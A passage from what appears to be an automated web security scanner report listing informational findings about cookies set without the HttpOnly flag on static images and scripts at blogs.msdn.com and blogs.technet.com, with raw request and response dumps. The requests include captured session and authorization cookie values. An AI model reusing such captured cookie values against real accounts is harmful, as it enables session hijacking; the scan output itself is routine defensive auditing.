Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a51+GMT; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a43%3a31+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: text/css
Last-Modified: Thu, 27 Jan 2011 20:42:04 GMT
Accept-Ranges: bytes
ETag: "579beda762becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Thu%2c+24+Mar+2011+11%3a02%3a45+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a53+GMT; expires=Sun, 25-Mar-2012 01:26:53 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:32 GMT
Content-Length: 73323

body, html {
   font-family: 'Segoe UI', 'Lucida Grande', Verdana, Arial, Helvetica, sans-serif;
   background:url('../Images/MSDN/bg_body_MSDN.png') repeat-x;
   color:#333;
   background-color:#CED5DB;
...[SNIP]...
15.66. http://blogs.msdn.com/themes/msdn2/images/MSDN/widget-right.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/msdn2/images/MSDN/widget-right.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/msdn2/images/MSDN/widget-right.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:07 GMT
Accept-Ranges: bytes
ETag: "862887a962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a42+GMT; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:40 GMT
Content-Length: 2975

.PNG
.
...IHDR.............N.X....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
15.67. http://blogs.msdn.com/themes/msdn2/images/msdn/widget-left.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /themes/msdn2/images/msdn/widget-left.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/msdn2/images/msdn/widget-left.png HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT; CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/png
Last-Modified: Thu, 27 Jan 2011 20:42:07 GMT
Accept-Ranges: bytes
ETag: "2c6586a962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a41%3a42+GMT; expires=Sun, 25-Mar-2012 01:41:42 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:40 GMT
Content-Length: 2823

.PNG
.
...IHDR.............X.k....    pHYs...............
OiCCPPhotoshop ICC profile..x..SgTS..=...BK...KoR.. RB....&*!    .J.!...Q..EE...........Q,..
...!.........{.k........>...........H3Q5...B.........
...[SNIP]...
15.68. http://blogs.msdn.com/utility/jquery/jquery-1.3.2.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /utility/jquery/jquery-1.3.2.min.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utility/jquery/jquery-1.3.2.min.js HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a00+GMT; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:54 GMT
Accept-Ranges: bytes
ETag: "9639f5c562becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+02+Mar+2011+04%3a19%3a46+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a35+GMT; expires=Sun, 25-Mar-2012 01:34:35 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:36 GMT
Content-Length: 57254

/*
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02-
...[SNIP]...
15.69. http://blogs.msdn.com/utility/js/omni_rsid_msdn_current.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.msdn.com
Path:   /utility/js/omni_rsid_msdn_current.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /utility/js/omni_rsid_msdn_current.js HTTP/1.1
Host: blogs.msdn.com
Proxy-Connection: keep-alive
Referer: http://blogs.msdn.com/b/sharepoint_workspace_development_team/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mstcid=e150914; omniID=1297806914247_3a81_9b84_2a24_e07e0b73e0ce; CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=d114cf6b-a8d3-4af4-869b-742773394143; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a00+GMT; communityserver-usercookie1001=lv=Thu%2c+24+Mar+2011+11%3a01%3a41+GMT&mra=Sat%2c+26+Mar+2011+01%3a26%3a56+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: application/x-javascript
Last-Modified: Thu, 27 Jan 2011 20:42:14 GMT
Accept-Ranges: bytes
ETag: "6485d5ad62becb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Wed%2c+23+Feb+2011+07%3a45%3a50+GMT&mra=Sat%2c+26+Mar+2011+01%3a34%3a38+GMT; expires=Sun, 25-Mar-2012 01:34:38 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET01
Date: Sat, 26 Mar 2011 01:43:38 GMT
Content-Length: 73913

// for sites using analytics.aspx, update omniGuidPath with the path to the analytics.aspx file, omitting the protocol
// for blogs this should be either
//        omniGuidPath : "://blogs.msdn.com/anal
...[SNIP]...
15.70. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/blogmarks.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/blogmarks.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/blogmarks.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "976c72c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a26+GMT; expires=Sun, 25-Mar-2012 01:35:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:52 GMT
Content-Length: 869

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.71. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/delicious.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/delicious.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/delicious.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "678778c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a22+GMT; expires=Sun, 25-Mar-2012 01:35:22 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:49 GMT
Content-Length: 865

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.72. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/digg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/digg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/digg.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "1be7ac962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a21+GMT; expires=Sun, 25-Mar-2012 01:35:21 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:49 GMT
Content-Length: 909

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.73. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/diigo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/diigo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/diigo.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "3f5c7ac962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a26+GMT; expires=Sun, 25-Mar-2012 01:35:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:52 GMT
Content-Length: 871

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.74. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/facebook.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/facebook.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/facebook.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "655d83c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a21+GMT; expires=Sun, 25-Mar-2012 01:35:21 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:49 GMT
Content-Length: 121

GIF89a..........;Y.Eb.`x.m...........!..    
...,..........>x..:!....X.<.1..y_xdA...jb_...T....:..,.D! ....Q@D..F....X..E..;
15.75. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/fark.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/fark.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/fark.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "24e683c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a26+GMT; expires=Sun, 25-Mar-2012 01:35:26 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:52 GMT
Content-Length: 887

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.76. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/faves.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/faves.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/faves.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "483484c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a27+GMT; expires=Sun, 25-Mar-2012 01:35:27 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:52 GMT
Content-Length: 920

GIF89a..................f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..3..3f.33.3............f..3..............f..3..............f..3..............f..3....f..f..f..ff.f3.f..3..3..
...[SNIP]...
15.77. http://blogs.technet.com/CustomWidgets/SocialMediaSharingUC/Resources/friendfeed.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://blogs.technet.com
Path:   /CustomWidgets/SocialMediaSharingUC/Resources/friendfeed.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /CustomWidgets/SocialMediaSharingUC/Resources/friendfeed.gif HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
Referer: http://blogs.technet.com/b/mmpc/archive/2011/03/24/very-bad-news-with-more-bad-news-embedded.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CommunityServer-LastVisitUpdated-1001=; AuthorizationCookie=edb8962d-9f8a-4571-ac76-68c02e3c42d9; CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a31%3a57+GMT

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Type: image/gif
Last-Modified: Thu, 27 Jan 2011 20:43:00 GMT
Accept-Ranges: bytes
ETag: "8cf386c962becb1:0"
Server: Microsoft-IIS/7.5
Telligent-Evolution: 5.5.134.13807
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: CommunityServer-UserCookie1001=lv=Fri%252c%2b01%2bJan%2b1999%2b00%253a00%253a00%2bGMT&mra=Sat%2c+26+Mar+2011+01%3a35%3a27+GMT; expires=Sun, 25-Mar-2012 01:35:27 GMT; path=/
X-Powered-By: ASP.NET
server: VBDNET09
Date: Sat, 26 Mar 2011 01:45:53 GMT
Content-Length: 914

